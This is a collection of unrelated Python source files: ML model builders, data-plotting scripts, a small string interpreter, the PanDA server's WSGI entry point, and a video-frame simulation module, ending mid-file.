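# Editorial usage sketch (not part of the original file): forward a dummy batch
# through the network; the input resolution is an illustrative assumption.
if __name__ == '__main__':
    net = SimpleConvNet(num_classes=10)
    dummy = torch.randn(2, 3, 32, 32)
    logits, feats = net(dummy)
    print(logits.shape, feats.shape)  # -> torch.Size([2, 10]) torch.Size([2, 128])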
|
python
|
import tensorflow as tf
import numpy as np
class Convolutional_NN(object):
def __init__(self):
pass
def lr_network(self, input_shape, label_shape):
"""
Create loss function and the list of metrics
Arguments:
input_shape: [list / tuple] input shape
label_shape: [list / tuple] output shape
"""
self.label_shape = label_shape
self.input_shape = input_shape
self.loss = tf.keras.losses.SparseCategoricalCrossentropy()
self.metrics = [tf.keras.metrics.SparseCategoricalAccuracy()]
def build_model(self):
'''
Return a CNN model
'''
model = tf.keras.models.Sequential()
model.add( tf.keras.Input(shape=self.input_shape))
if len(self.input_shape) == 1:
model.add(tf.keras.layers.Reshape((int(np.sqrt(self.input_shape[-1])), int(np.sqrt(self.input_shape[-1])),1), input_shape=(784,)))
model.add( tf.keras.layers.Conv2D(32, kernel_size=(3, 3), activation="relu"))
model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))
model.add(tf.keras.layers.Flatten())
model.add(tf.keras.layers.Dense(128))
model.add(tf.keras.layers.Dense(self.label_shape[-1], activation="softmax"))
return model
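# Editorial usage sketch (not part of the original class), assuming MNIST-style
# shapes: build and compile the model with the loss/metrics defined above.
if __name__ == '__main__':
    cnn = Convolutional_NN()
    cnn.lr_network(input_shape=(28, 28, 1), label_shape=(10,))
    model = cnn.build_model()
    model.compile(optimizer='adam', loss=cnn.loss, metrics=cnn.metrics)
    model.summary()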
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 06 15:07:49 2016
@author: Mike
"""
from __future__ import division
import pandas as pd
import numpy as np
import matplotlib.lines as mlines
import matplotlib.pyplot as plt
from matplotlib.legend_handler import HandlerLine2D
import os
from geopy.distance import vincenty
from mpl_toolkits.basemap import Basemap
def findClosestStation(coords1, coords2):
'''
Function finds the closest value of coords2 to each value in coords1.
Inputs:
coords1 (iterable) - contains (lat, long) pairs
coords2 (iterable) - contains (lat, long) pairs
Outputs:
closest (list) - contains tuple of (index, distance_miles) of closest point
in coords2 to each tuple in coords1.
'''
closest = []
# for each pair of coordinates in coords1
for firLoc in coords1:
dis = []
# calculate the distance to each coordinate pair in coords2
for secLoc in coords2:
# append the distance in miles
dis.append(vincenty(firLoc,secLoc).miles)
# find the minimum distance and the index
# Uses base python, but numpy.argmin is applicable
# Check documentation on built-in functions for min and enumerate
min_index, min_distance = min(enumerate(dis), key = lambda p: p[1])
# store results
closest.append((min_index, min_distance))
return closest
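# Editorial example (hypothetical coordinates): with one building and two
# candidate stations, the function returns the index of the nearer station and
# the distance to it in miles, e.g.
#     findClosestStation([(39.74, -104.99)], [(34.05, -118.24), (39.77, -104.87)])
#     -> [(1, <distance in miles>)]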
def main():
# locate the meta data
fname = 'all_sites.csv'
metaDataPath = os.path.join(os.pardir, os.pardir, 'csv-only',
'meta', fname)
# locate tmy3 meta dat
fname = 'TMY3_StationsMeta.csv'
tmy3DataPath = os.path.join(os.pardir, os.pardir,'csv-only',
'meta', fname)
# Read the data into a pandas dataframe
tmy3MetaData = pd.DataFrame.from_csv(tmy3DataPath, index_col=None)
metaData = pd.DataFrame.from_csv(metaDataPath, index_col=None)
# get location data
lat = metaData[u'LAT'].values
lng = metaData[u'LNG'].values
# Find closest TMY3 weather data to each building
tmy3_lat = tmy3MetaData['Latitude'].values
tmy3_lng = tmy3MetaData['Longitude'].values
min_distance = findClosestStation(list(zip(lat,lng)),
list(zip(tmy3_lat,tmy3_lng)))
# store unique attributes of each minimum distance station
tmy3SiteNames = [tmy3MetaData['Site Name'][x[0]] for x in min_distance]
#---------------------------------------------------------------------------
# Find the biggest cluster of buildings
#---------------------------------------------------------------------------
'''
There is a weather station that has the most buildings for which it is the
closest weather station. Determine this station and plot the energy use
of these buildings.
'''
# list of all the indexes
index_list = [x[0] for x in min_distance]
# get the mode of the indexes (i.e., the most frequent)
most_freq = max(set(index_list), key = index_list.count)
# get the indices of the buildings that match the most frequent weather station
keepers = []
for index, tup in enumerate(min_distance):
if tup[0] == most_freq:
keepers.append(index)
# subset the pandas dataframe to pick the relevant buildings and get their data
keeperData = []
for index in keepers:
# get the site id
siteId = metaData[u'SITE_ID'][index]
# create path to data
buiFullPath = os.path.join(os.pardir, os.pardir, 'csv-only', 'csv', '{}.csv'.format(siteId))
# read energy data
energy_kWh = np.genfromtxt(buiFullPath, delimiter=',',skip_header=1,
usecols=2)
# annual energy use in kBTU
energyAnn_kBTU = np.sum(energy_kWh*3.412)
# get meta data
flrArea = metaData[u'SQ_FT'][index]
industry = metaData[u'INDUSTRY'][index]
# full building info
buiInfo = (siteId, energyAnn_kBTU, flrArea, industry, buiFullPath)
# save and append the data
keeperData.append(buiInfo)
#---------------------------------------------------------------------------
# Final plotting of the data
#---------------------------------------------------------------------------
'''
Create a scatter plot with square footage on x axis, energy use on y axis
and colored by industry type.
'''
# create a color for each of the unique industries
indNames = set([x[3] for x in keeperData])
numIndustries = len(indNames)
# get a color from a color map
cm = plt.get_cmap('Set1')
colPts = np.linspace(0.0, 0.5, numIndustries)
# relational database
type_color_map = dict(zip(indNames, colPts))
# get the data
colors = [type_color_map[x[3]] for x in keeperData]
sqFt = [x[2] for x in keeperData]
eneUse = [x[1]/1000 for x in keeperData]
areas = [np.interp(kk, [min(eneUse), np.percentile(eneUse, 25),
np.percentile(eneUse, 75),
max(eneUse)],
np.array([5, 10, 20, 40])*10) for kk in eneUse]
# plot
plt.scatter(sqFt, eneUse, c=colors, s = areas, edgecolor='')
plt.xlabel('Square Feet')
plt.ylabel('Annual Energy Use [MBTU]')
# Ensure the required directory exists
if not os.path.isdir('../../figures'):
os.mkdir('../../figures')
# Save figure
plt.savefig('../../figures/buildingsdata-session3.png')
if __name__ == '__main__':
main()
|
python
|
# Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
a.b -= 2
a[0] += 1
a[0:2] += 1
|
python
|
import re
class JSVM(object):
_memory = {}
_program = []
_js_methods = {}
def __init__(self, code=""):
# TODO: parse automatically the 'swap' method
# function Bn(a,b){var c=a[0];a[0]=a[b%a.length];a[b]=c;return a};
def _swap(args):
a = list(args[0])
b = int(args[1])
c = a[0]
a[0] = a[b % len(a)]
a[b] = c
return "".join(a)
def _split(args):
return ""
def _slice(args):
return args[0][int(args[1]):]
def _reverse(args):
return args[0][::-1]
def _join(args):
return "".join(args[0])
def _assign(args):
return args[0]
def _get(args):
return self._memory[args[0]]
self._js_methods = {
"split": _split,
"slice": _slice,
"reverse": _reverse,
"join": _join,
"$swap": _swap,
"$assign": _assign,
"$get": _get
}
if code != "":
self.compile(code)
def compile(self, code):
self._program = []
regex = re.compile(r"(\w+\.)?(\w+)\(([^)]*)\)")
code = code.replace("return ", "return=")
for instruction in code.split(";"):
#print instruction
var, method = instruction.split("=")
m = regex.match(method)
if m is None:
arguments = [method[1:-1]]
method = "$assign"
else:
m = m.groups()
#print m
arguments = []
pre_args = [m[0][:-1]] if m[0] is not None else []
pre_args += m[2].split(",")
for a in pre_args:
if a is None or a == "":
continue
                    # Replace variables with their values
arguments += [JSMethod(self._js_methods["$get"], a) if not a[0] == '"' and not a[0] == '' and not a.isdigit() else a]
# Suppose that an undefined method is '$swap' method
method = "$swap" if m[1] not in self._js_methods.keys() else m[1]
self._program += [(var, JSMethod(self._js_methods[method], arguments))]
return self._program
def setPreinterpreted(self, program):
self._program = program
def run(self):
for ins in self._program:
#print "%s(%s)" % (ins[1]._m.__name__, ins[1]._a)
if ins[0] not in self._memory:
self._memory[ins[0]] = None
self._memory[ins[0]] = ins[1].run()
return self._memory
class JSMethod(object):
def __init__(self, method, args):
self._m = method
self._a = args
def run(self):
args = [a.run() if isinstance(a, JSMethod) else a for a in self._a]
return self._m(args)
def __repr__(self):
return "%s(%s)" % (self._m.__name__, self._a)
|
python
|
#!/usr/bin/python
"""
entry point
"""
import datetime
import traceback
import six
import tempfile
import io
import signal
import json
import gzip
# config file
from pandaserver.config import panda_config
from pandaserver.taskbuffer.Initializer import initializer
from pandaserver.taskbuffer.TaskBuffer import taskBuffer
from pandaserver.jobdispatcher.JobDispatcher import jobDispatcher
from pandaserver.dataservice.DataService import dataService
from pandaserver.userinterface.UserIF import userIF
from pandaserver.taskbuffer.Utils import isAlive, putFile, deleteFile, getServer, updateLog, fetchLog,\
touchFile, getVomsAttr, putEventPickingRequest, getAttr, uploadLog, put_checkpoint, delete_checkpoint,\
put_file_recovery_request, put_workflow_request
from pandaserver.dataservice.DataService import datasetCompleted, updateFileStatusInDisp
from pandaserver.jobdispatcher.JobDispatcher import getJob, updateJob, getStatus, genPilotToken,\
getEventRanges, updateEventRange, getKeyPair, updateEventRanges, getDNsForS3, getProxy, getCommands, ackCommands,\
checkJobStatus, checkEventsAvailability, updateJobsInBulk, getResourceTypes
from pandaserver.userinterface.UserIF import submitJobs, getJobStatus, queryPandaIDs, killJobs, reassignJobs,\
getJobStatistics, getJobStatisticsPerSite, resubmitJobs, queryLastFilesInDataset, getPandaIDsSite,\
getJobsToBeUpdated, updateProdDBUpdateTimes, runTaskAssignment, getAssigningTask, getSiteSpecs,\
getCloudSpecs, seeCloudTask, queryJobInfoPerCloud, registerProxyKey, getProxyKey,\
getJobIDsInTimeRange, getPandIDsWithJobID, getFullJobStatus, getJobStatisticsForBamboo,\
getNUserJobs, addSiteAccess, listSiteAccess, getFilesInUseForAnal, updateSiteAccess,\
getPandaClientVer, getSlimmedFileInfoPandaIDs, getQueuedAnalJobs, getHighestPrioJobStat,\
getActiveDatasets, setCloudTaskByUser, getSerialNumberForGroupJob, getCachePrefixes,\
checkMergeGenerationStatus, getNumPilots, retryFailedJobsInActive,\
getJobStatisticsWithLabel, getPandaIDwithJobExeID, getJobStatisticsPerUserSite,\
getDisInUseForAnal, getLFNsInUseForAnal, getScriptOfflineRunning, setDebugMode,\
insertSandboxFileInfo, checkSandboxFile, changeJobPriorities, insertTaskParams,\
killTask, finishTask, getCmtConfigList, getJediTasksInTimeRange, getJediTaskDetails,\
retryTask, getRetryHistory, changeTaskPriority, reassignTask, changeTaskAttributePanda,\
pauseTask, resumeTask, increaseAttemptNrPanda, killUnfinishedJobs, changeTaskSplitRulePanda,\
changeTaskModTimePanda, avalancheTask, getPandaIDsWithTaskID, reactivateTask, getTaskStatus, \
reassignShare, listTasksInShare, getTaskParamsMap, updateWorkers, harvesterIsAlive,\
reportWorkerStats, reportWorkerStats_jobtype, addHarvesterDialogs, getJobStatisticsPerSiteResource, setNumSlotsForWP,\
reloadInput, enableJumboJobs, updateServiceMetrics, getUserJobMetadata, getJumboJobDatasets, getGShareStatus,\
sweepPQ, get_job_statistics_per_site_label_resource, relay_idds_command, send_command_to_job,\
execute_idds_workflow_command
# import error
import pandaserver.taskbuffer.ErrorCode
# initialize cx_Oracle using dummy connection
initializer.init()
# initialize TaskBuffer
taskBuffer.init(panda_config.dbhost, panda_config.dbpasswd, panda_config.nDBConnection, True)
# initialize JobDispatcher
if panda_config.nDBConnection != 0:
jobDispatcher.init(taskBuffer)
# initialize DataService
if panda_config.nDBConnection != 0:
dataService.init(taskBuffer)
# initialize UserIF
if panda_config.nDBConnection != 0:
userIF.init(taskBuffer)
# import web I/F
allowedMethods = []
allowedMethods += ['isAlive', 'putFile', 'deleteFile', 'getServer', 'updateLog', 'fetchLog',
'touchFile', 'getVomsAttr', 'putEventPickingRequest', 'getAttr',
'uploadLog', 'put_checkpoint', 'delete_checkpoint', 'put_file_recovery_request',
'put_workflow_request']
allowedMethods += ['datasetCompleted', 'updateFileStatusInDisp']
allowedMethods += ['getJob', 'updateJob', 'getStatus', 'genPilotToken',
'getEventRanges', 'updateEventRange', 'getKeyPair',
'updateEventRanges', 'getDNsForS3', 'getProxy', 'getCommands', 'ackCommands',
'checkJobStatus', 'checkEventsAvailability', 'updateJobsInBulk', 'getResourceTypes']
allowedMethods += ['submitJobs', 'getJobStatus', 'queryPandaIDs', 'killJobs', 'reassignJobs', 'getJobStatistics',
'getJobStatisticsPerSite', 'resubmitJobs', 'queryLastFilesInDataset', 'getPandaIDsSite',
'getJobsToBeUpdated', 'updateProdDBUpdateTimes', 'runTaskAssignment', 'getAssigningTask',
'getSiteSpecs', 'getCloudSpecs', 'seeCloudTask', 'queryJobInfoPerCloud', 'registerProxyKey',
'getProxyKey', 'getJobIDsInTimeRange', 'getPandIDsWithJobID', 'getFullJobStatus',
'getJobStatisticsForBamboo', 'getNUserJobs', 'addSiteAccess', 'listSiteAccess',
'getFilesInUseForAnal', 'updateSiteAccess', 'getPandaClientVer', 'getSlimmedFileInfoPandaIDs',
'getQueuedAnalJobs', 'getHighestPrioJobStat', 'getActiveDatasets', 'setCloudTaskByUser',
'getSerialNumberForGroupJob', 'getCachePrefixes', 'checkMergeGenerationStatus', 'getNumPilots',
'retryFailedJobsInActive', 'getJobStatisticsWithLabel', 'getPandaIDwithJobExeID',
'getJobStatisticsPerUserSite', 'getDisInUseForAnal', 'getLFNsInUseForAnal', 'getScriptOfflineRunning',
'setDebugMode', 'insertSandboxFileInfo', 'checkSandboxFile', 'changeJobPriorities',
'insertTaskParams', 'killTask', 'finishTask', 'getCmtConfigList', 'getJediTasksInTimeRange',
'getJediTaskDetails', 'retryTask', 'getRetryHistory', 'changeTaskPriority', 'reassignTask',
'changeTaskAttributePanda', 'pauseTask', 'resumeTask', 'increaseAttemptNrPanda',
'killUnfinishedJobs', 'changeTaskSplitRulePanda', 'changeTaskModTimePanda', 'avalancheTask',
'getPandaIDsWithTaskID', 'reactivateTask', 'getTaskStatus',
'reassignShare', 'listTasksInShare', 'getTaskParamsMap', 'updateWorkers', 'harvesterIsAlive',
'reportWorkerStats', 'reportWorkerStats_jobtype', 'addHarvesterDialogs',
'getJobStatisticsPerSiteResource', 'setNumSlotsForWP', 'reloadInput', 'enableJumboJobs',
'updateServiceMetrics', 'getUserJobMetadata', 'getJumboJobDatasets',
'getGShareStatus', 'sweepPQ', 'get_job_statistics_per_site_label_resource', 'relay_idds_command',
'send_command_to_job', 'execute_idds_workflow_command']
# FastCGI/WSGI entry
if panda_config.useFastCGI or panda_config.useWSGI:
import os
import cgi
from pandacommon.pandalogger.PandaLogger import PandaLogger
from pandacommon.pandalogger.LogWrapper import LogWrapper
if panda_config.token_authType is None:
pass
elif panda_config.token_authType == 'scitokens':
import scitokens
else:
from pandaserver.srvcore import oidc_utils
# logger
_logger = PandaLogger().getLogger('Entry')
# dummy request object
class DummyReq:
def __init__(self, env, tmpLog):
# environ
self.subprocess_env = env
# header
self.headers_in = {}
# authentication
self.authenticated = True
# message
self.message = None
# content-length
if 'CONTENT_LENGTH' in self.subprocess_env:
self.headers_in["content-length"] = self.subprocess_env['CONTENT_LENGTH']
# scitoken
try:
if panda_config.token_authType in ['scitokens', 'oidc'] and 'HTTP_AUTHORIZATION' in env:
serialized_token = env['HTTP_AUTHORIZATION'].split()[1]
if panda_config.token_authType == 'scitokens':
token = scitokens.SciToken.deserialize(serialized_token, audience=panda_config.token_audience)
else:
if 'HTTP_ORIGIN' in env:
vo = env['HTTP_ORIGIN']
else:
vo = None
token = oidc_utils.deserialize_token(serialized_token, panda_config.auth_config,
vo)
# check with auth policies
if panda_config.token_authType == 'oidc':
self.authenticated = False
vo = token["vo"]
if vo not in panda_config.auth_policies:
self.message = 'unknown vo : {}'.format(vo)
tmpLog.error('{} - {}'.format(self.message, env['HTTP_AUTHORIZATION']))
else:
for memberStr, memberInfo in panda_config.auth_policies[vo]:
if memberStr in token["groups"]:
self.subprocess_env['PANDA_OIDC_VO'] = vo
self.subprocess_env['PANDA_OIDC_GROUP'] = memberInfo['group']
self.subprocess_env['PANDA_OIDC_ROLE'] = memberInfo['role']
self.authenticated = True
break
if not self.authenticated:
self.message = 'invalid member in {}'.format(vo)
tmpLog.error('{} - {}'.format(self.message, env['HTTP_AUTHORIZATION']))
# check issuer
if 'iss' not in token:
self.message = 'issuer is undefined in the token'
tmpLog.error(self.message)
else:
if panda_config.token_authType == 'scitokens':
items = token.claims()
else:
items = six.iteritems(token)
for c, v in items:
self.subprocess_env['PANDA_OIDC_CLAIM_{0}'.format(str(c))] = str(v)
# use sub and scope as DN and FQAN
if 'SSL_CLIENT_S_DN' not in self.subprocess_env:
if 'name' in token:
self.subprocess_env['SSL_CLIENT_S_DN'] = str(token['name'])
else:
self.subprocess_env['SSL_CLIENT_S_DN'] = str(token['sub'])
i = 0
for scope in token.get('scope', '').split():
if scope.startswith('role:'):
self.subprocess_env['GRST_CRED_AUTH_TOKEN_{0}'.format(i)] = 'VOMS ' + str(scope.split(':')[-1])
i += 1
except Exception as e:
self.message = 'invalid token: {}'.format(str(e))
tmpLog.error('{} - {}'.format(self.message, env['HTTP_AUTHORIZATION']))
# get remote host
def get_remote_host(self):
if 'REMOTE_HOST' in self.subprocess_env:
return self.subprocess_env['REMOTE_HOST']
return ""
# accept json
def acceptJson(self):
try:
if 'HTTP_ACCEPT' in self.subprocess_env:
return 'application/json' in self.subprocess_env['HTTP_ACCEPT']
except Exception:
pass
return False
# application
def application(environ, start_response):
# get method name
methodName = ''
if 'SCRIPT_NAME' in environ:
methodName = environ['SCRIPT_NAME'].split('/')[-1]
tmpLog = LogWrapper(_logger, "PID={0} {1}".format(os.getpid(), methodName), seeMem=True)
cont_length = int(environ.get('CONTENT_LENGTH', 0))
json_body = environ.get('CONTENT_TYPE', None) == 'application/json'
tmpLog.debug("start content-length={} json={}".format(cont_length, json_body))
regStart = datetime.datetime.utcnow()
retType = None
# check method name
if methodName not in allowedMethods:
tmpLog.error("is forbidden")
exeRes = "False : %s is forbidden" % methodName
else:
# get method object
tmpMethod = None
try:
tmpMethod = globals()[methodName]
except Exception:
pass
# object not found
if tmpMethod is None:
tmpLog.error("is undefined")
exeRes = "False"
else:
body = b''
try:
while cont_length > 0:
chunk = environ['wsgi.input'].read(min(cont_length, 1024*1024))
if not chunk:
break
cont_length -= len(chunk)
body += chunk
if cont_length > 0:
raise OSError('partial read from client. {} bytes remaining'.format(cont_length))
if not json_body:
# query string
environ['wsgi.input'] = io.BytesIO(body)
# get params
tmpPars = cgi.FieldStorage(environ['wsgi.input'], environ=environ,
keep_blank_values=1)
# convert to map
params = {}
for tmpKey in list(tmpPars):
if tmpPars[tmpKey].file is not None and tmpPars[tmpKey].filename is not None:
# file
params[tmpKey] = tmpPars[tmpKey]
else:
# string
params[tmpKey] = tmpPars.getfirst(tmpKey)
else:
# json
body = gzip.decompress(body)
params = json.loads(body)
if panda_config.entryVerbose:
tmpLog.debug("with %s" % str(list(params)))
# dummy request object
dummyReq = DummyReq(environ, tmpLog)
if not dummyReq.authenticated:
start_response('403 Forbidden', [('Content-Type', 'text/plain')])
return ["ERROR : token-based authentication failed on the server side with {}".format(
dummyReq.message).encode()]
param_list = [dummyReq]
# exec
exeRes = tmpMethod(*param_list, **params)
# extract return type
if isinstance(exeRes, dict):
retType = exeRes['type']
exeRes = exeRes['content']
# convert bool to string
if exeRes in [True,False]:
exeRes = str(exeRes)
except Exception as e:
tmpLog.error("execution failure : {0}\n {1}".format(str(e), traceback.format_exc()))
if hasattr(panda_config, 'dumpBadRequest') and panda_config.dumpBadRequest:
try:
with tempfile.NamedTemporaryFile(delete=False, prefix='req_dump_') as f:
environ['WSGI_INPUT_DUMP'] = f.name
f.write(body)
os.chmod(f.name, 0o775)
except Exception:
tmpLog.error(traceback.format_exc())
pass
errStr = ""
for tmpKey in environ:
tmpVal = environ[tmpKey]
errStr += "%s : %s\n" % (tmpKey,str(tmpVal))
tmpLog.error(errStr)
# return internal server error
start_response('500 INTERNAL SERVER ERROR', [('Content-Type', 'text/plain')])
# force kill to release memory
if type(e) == OSError:
tmpLog.warning('force restart to release memory')
os.kill(os.getpid(), signal.SIGINT)
return [str(e).encode()]
if panda_config.entryVerbose:
tmpLog.debug("done")
regTime = datetime.datetime.utcnow() - regStart
tmpLog.info("exec_time=%s.%03d sec, return len=%s B" % (regTime.seconds,
regTime.microseconds/1000,
len(str(exeRes))))
# return
if exeRes == pandaserver.taskbuffer.ErrorCode.EC_NotFound:
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['not found'.encode()]
elif isinstance(exeRes, pandaserver.taskbuffer.ErrorCode.EC_Redirect):
start_response('302 Redirect', [('Location', exeRes.url)])
return ['redirect'.encode()]
else:
if retType == 'json':
start_response('200 OK', [('Content-Type', 'application/json')])
else:
start_response('200 OK', [('Content-Type', 'text/plain')])
if isinstance(exeRes, str):
exeRes = exeRes.encode()
return [exeRes]
# start server
if panda_config.useFastCGI:
from flup.server.fcgi import WSGIServer
WSGIServer(application,multithreaded=False).run()
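# Note (hypothetical, not part of the original entry point): since `application`
# is a plain WSGI callable, it could also be served locally for testing with the
# standard library, e.g.
#
#   from wsgiref.simple_server import make_server
#   make_server('localhost', 8080, application).serve_forever()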
|
python
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
from matplotlib.font_manager import FontProperties
import matplotlib.lines as mlines
import matplotlib.pyplot as plt
import numpy as np
def file2matrix(file_name):
file = open(file_name)
array_lines = file.readlines()
number_of_lines = len(array_lines)
return_matrix = np.zeros((number_of_lines,3))
class_label_vector = []
index = 0
for line in array_lines:
line = line.strip()
list_line = line.split('\t')
return_matrix[index,:] = list_line[0:3]
if list_line[-1] == 'didntLike':
class_label_vector.append(1)
if list_line[-1] == 'smallDoses':
class_label_vector.append(2)
if list_line[-1] == 'largeDoses':
class_label_vector.append(3)
index += 1
return return_matrix,class_label_vector
def show_data(dating_data_mat,dating_labels):
font = FontProperties(fname=r"c:\windows\fonts\simsun.ttc",size=14)
fig,axs = plt.subplots(nrows=2,ncols=2,sharex=False,sharey=False)#,figsize=(13,8))
number_of_labels = len(dating_labels)
labels_colors=[]
for i in dating_labels:
if i == 1:
labels_colors.append('black')
if i == 2:
labels_colors.append('orange')
if i == 3:
labels_colors.append('red')
axs[0][0].scatter(x=dating_data_mat[:,0],y=dating_data_mat[:,1],color=labels_colors,s=15,alpha=.5)
axs0_title_text = axs[0][0].set_title(u'Frequent flyer miles earned per year vs. percentage of time spent playing video games', fontproperties=font)
axs0_xlabel_text = axs[0][0].set_xlabel(u'', fontproperties=font)
axs0_ylabel_text = axs[0][0].set_ylabel(u'', fontproperties=font)
plt.setp(axs0_title_text,size=9,weight='bold',color='red')
plt.setp(axs0_xlabel_text,size=7,weight='bold',color='black')
plt.setp(axs0_ylabel_text,size=7,weight='bold',color='black')
plt.show()
if __name__ == '__main__':
file_name = 'datingTestSet.txt'
dating_data_mat,dating_labels = file2matrix(file_name)
show_data(dating_data_mat,dating_labels)
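# Note (hypothetical example, not part of the original script): file2matrix
# expects a tab-separated file with three numeric features followed by a text
# label on each line, e.g. "40920\t8.326976\t0.953952\tlargeDoses".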
|
python
|
# Copyright (c) 2022 Manuel Olguín Muñoz <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
import time
from collections import deque
from os import PathLike
from typing import Any, Dict, Iterator, Sequence, Tuple
import numpy as np
import numpy.typing as npt
import pandas as pd
import yaml
class FrameSet:
"""
Abstraction of a set of video frames for the model.
Easiest way to build an instance of this class is using the
FrameSet.from_datafile class method. This method takes a tracefile in
.npz format and parses it.
"""
def __init__(
self,
name: str,
initial_frame: npt.NDArray,
steps: Sequence[Dict[str, npt.NDArray]],
):
"""
Parameters
----------
name
A name for the task represented by this trace of frames.
initial_frame
The initial video frame required by the backend to initialize
the task.
steps
A sequence containing dictionaries mapping frame tags to video
frames, in order of steps.
Note that it is expected that all steps have the same tags!
"""
self._name = name
self._init_frame = initial_frame
self._steps = tuple(steps)
self._num_steps = len(self._steps)
def __str__(self) -> str:
return yaml.safe_dump(
{
"name": self._name,
"num_steps": self.step_count,
"initial_frame": f"{len(self._init_frame.tobytes())} bytes",
"steps": [
{tag: f"{len(data.tobytes())} bytes" for tag, data in step.items()}
for step in self._steps
],
}
)
@property
def step_count(self) -> int:
return self._num_steps
@property
def name(self) -> str:
return self._name
def get_initial_frame(self) -> npt.NDArray:
"""
Returns
-------
npt.NDArray
The initial video frame for this task.
"""
return self._init_frame.copy()
def get_frame(self, step_index: Any, frame_tag: str) -> npt.NDArray:
"""
Looks up a frame for a specific tag in a step.
Parameters
----------
step_index
Step index.
frame_tag
Frame tag to look up.
Returns
-------
npt.NDArray
A video frame.
"""
return self._steps[step_index][frame_tag].copy()
@classmethod
def from_datafile(cls, task_name: str, trace_path: PathLike | str) -> FrameSet:
"""
Opens a frame tracefile and parses it.
Traces correspond to compressed numpy array files (.npz) containing
the following arrays:
- An array called "initial" corresponding to the initial frame for
the task.
- A number `M x N` of arrays, where M is the number of different
possible tags for frames during a step, and N corresponds to
the number of steps in the trace. Each of these arrays is named
following the convention "step<step index (two digits,
0-padded)>_<frame tag>".
Parameters
----------
task_name
Task name for this trace.
trace_path
Path to the datafile.
Returns
-------
FrameSet
A FrameSet object.
"""
data = np.load(trace_path)
# trace NPZ file contains initial frame + 3 frames per step
# success, blank, and low_confidence
# TODO: this assumes 3 frame categories per step (success, low confidence and
# blank (repeat is simply the previous success)). Maybe we should add a way
# of configuring that.
assert (len(data) - 1) % 3 == 0
num_steps = (len(data) - 1) // 3
init_frame = data["initial"]
# TODO: hardcoded categories
steps = deque()
repeat = init_frame
for step in range(num_steps):
step_dict = {}
for tag in ("success", "blank", "low_confidence"):
step_dict[tag] = data[f"step{step:02d}_{tag}"]
step_dict["repeat"] = repeat
repeat = step_dict["success"]
steps.append(step_dict)
return FrameSet(name=task_name, initial_frame=init_frame, steps=steps)
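# Hypothetical helper (not part of the original module): one way to produce an
# .npz trace that FrameSet.from_datafile can parse, i.e. an "initial" array plus
# one "step<index>_<tag>" array per step and tag. Shapes and dtype here are
# illustrative only.
def _write_dummy_trace(path: str, num_steps: int = 2) -> None:
    frames = {"initial": np.zeros((8, 8, 3), dtype=np.uint8)}
    for step in range(num_steps):
        for tag in ("success", "blank", "low_confidence"):
            frames[f"step{step:02d}_{tag}"] = np.zeros((8, 8, 3), dtype=np.uint8)
    np.savez_compressed(path, **frames)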
class FrameModel:
def __init__(self, probabilities: pd.DataFrame, success_tag: str = "success"):
"""
Parameters
----------
probabilities
A Pandas DataFrame containing two columns 'bin_start' and
'bin_end', and an arbitrary number of additional columns.
'bin_start' and 'bin_end' correspond to the left and right limits
respectively of left-inclusive, right-exclusive bins of relative
time position (e.g. if total duration is 10 seconds, 3 seconds
would fall in bin [0.0, 0.5) and 7 seconds in bin [0.5, 1.0)).
All other columns are interpreted as relative probabilities for a
tag (identified by the column name) within a bin.
All probabilities for tags in a bin MUST add up to 1.0.
For example, a row<br><br>
<table>
<thead>
<tr>
<th>bin_start</th>
<th>bin_end</th>
<th>repeat</th>
<th>low_confidence</th>
<th>blank</th>
</tr>
</thead>
<tbody>
<tr>
<td>0.0</td>
<td>0.2</td>
<td>0.3</td>
<td>0.1</td>
<td>0.6</td>
</tr>
</tbody>
</table><br>
indicates that within bin [0, 0.2), 'repeat' frames occur with a
relative probability of 0.3, 'low_confidence' frames with a
relative probability of 0.1, and 'blank' frames with a relative
probability of 0.6.
success_tag
String to be returned by methods of this class whenever the target
step time has been achieved.
"""
# validation
columns = set(probabilities.columns)
try:
columns.remove("bin_start")
columns.remove("bin_end")
except KeyError:
raise RuntimeError(
"Probability dataframe must include bin_start " "and bin_end columns."
)
prob_sums = np.zeros(len(probabilities.index))
for column in columns:
prob_sums += probabilities[column]
if not np.all(np.isclose(prob_sums, 1.0)):
raise RuntimeError(
"Sum of probabilities for each bin must be " "equal to 1.0."
)
# process probabilities
self._probs = probabilities.copy()
self._probs["interval"] = pd.IntervalIndex.from_arrays(
left=probabilities["bin_start"],
right=probabilities["bin_end"],
closed="left",
)
self._probs = self._probs.drop(columns=["bin_start", "bin_end"]).set_index(
"interval", verify_integrity=True
)
self._rng = np.random.default_rng()
self._success_tag = success_tag
def _sample_from_distribution(self, rel_pos: float) -> str:
# at or past the target time, the step is considered complete
if rel_pos >= 1:
return self._success_tag
probs = self._probs[self._probs.index.contains(rel_pos)].iloc[0]
return self._rng.choice(a=probs.index, replace=False, p=probs.values)
def get_frame_at_instant(self, instant: float | int, step_time: float | int) -> str:
"""
Return a frame sampled from a specific instant in a step.
Parameters
----------
instant
Number of seconds since the start of the step.
step_time
Total target step duration.
Returns
-------
str
A randomly sampled step tag.
"""
# purely according to distributions
try:
return self._sample_from_distribution(float(instant) / float(step_time))
except ZeroDivisionError:
# if step time is 0 we can immediately assume step is over!
return self._success_tag
def step_iterator(
self, target_time: float, infinite: bool = False
) -> Iterator[Tuple[str, float]]:
"""
An iterator over the frame tags in a step.
Any calls to next() between instants 0 and target_time will
correspond to frame tags sampled from the internal distributions.
Calls to next() after a time greater than the target time has
elapsed will always return a success tag; if infinite is False, the iterator
will additionally be closed.
Yields
------
str
Frame tags.
"""
step_start = time.monotonic()
while True:
instant = time.monotonic() - step_start
yield self.get_frame_at_instant(instant, target_time), instant
if instant > target_time and not infinite:
return
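if __name__ == "__main__":
    # Hypothetical usage sketch (not part of the original module): build a
    # two-bin probability table of the shape described in FrameModel.__init__
    # (tag names and values are illustrative) and sample a few instants of a
    # 5-second step.
    example_probs = pd.DataFrame(
        {
            "bin_start": [0.0, 0.5],
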